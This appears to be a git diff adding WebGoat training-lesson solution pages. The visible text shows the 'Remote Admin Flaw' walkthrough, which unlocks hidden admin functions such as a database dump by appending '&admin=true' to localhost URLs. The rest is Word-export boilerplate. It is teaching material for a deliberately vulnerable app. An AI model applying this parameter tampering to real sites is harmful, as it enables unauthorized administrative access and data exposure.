+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
+style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Append <i
+style='mso-bidi-font-style:normal'>&amp;admin=true</i> to the URL in the
+browser and hit “Enter”<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Open the menu
+“Admin functions” and notice that you have additional menu options like
+“Database Dump”, “User Information” and “Product Information”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_452"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image004.jpg" v:shapes="Picture_x0020_452"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Some extra admin functions<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Clicking on
+“User Information” will not work. This is because the URL behind “User
+Information” is <a href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10">http://localhost/WebGoat/attack?Screen=71&amp;menu=10</a>
+does not contain the parameter admin=true. Rewrite the URL to become <a
+href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true">http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true</a><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><u><span
+style='font-family:"Arial","sans-serif"'>Remark: </span></u></b><span
+style='font-family:"Arial","sans-serif"'>the parameter Screen is generated
+randomly and can be different in your environment!<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_453"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=369
+src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image006.jpg" v:shapes="Picture_x0020_453"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>3</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 7 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/filelist.xml b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/filelist.xml
new file mode 100644
index 000000000..abc27092d
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../RemoteAdminFlaw.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image001.png b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image001.png
new file mode 100644
index 000000000..eb4392c2d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image002.jpg b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image002.jpg
new file mode 100644
index 000000000..6301ccbb1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image003.png b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image003.png
new file mode 100644
index 000000000..b6bf2f272
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image004.jpg b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image004.jpg
new file mode 100644
index 000000000..d94ac96c1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image005.png b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image005.png
new file mode 100644
index 000000000..4a274e847
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image006.jpg b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image006.jpg
new file mode 100644
index 000000000..b93cbad84
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions.html b/main/project/WebContent/lesson_solutions/SilentTransactions.html
new file mode 100644
index 000000000..06ef67a06
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SilentTransactions.html
@@ -0,0 +1,932 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/SilentTransactions_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SilentTransactions_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>54</o:TotalTime>
+  <o:Created>2007-07-11T15:30:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:20:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>607</o:Words>
+  <o:Characters>3461</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>28</o:Lines>
+  <o:Paragraphs>8</o:Paragraphs>
+  <o:CharactersWithSpaces>4060</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/SilentTransactions_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/SilentTransactions_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
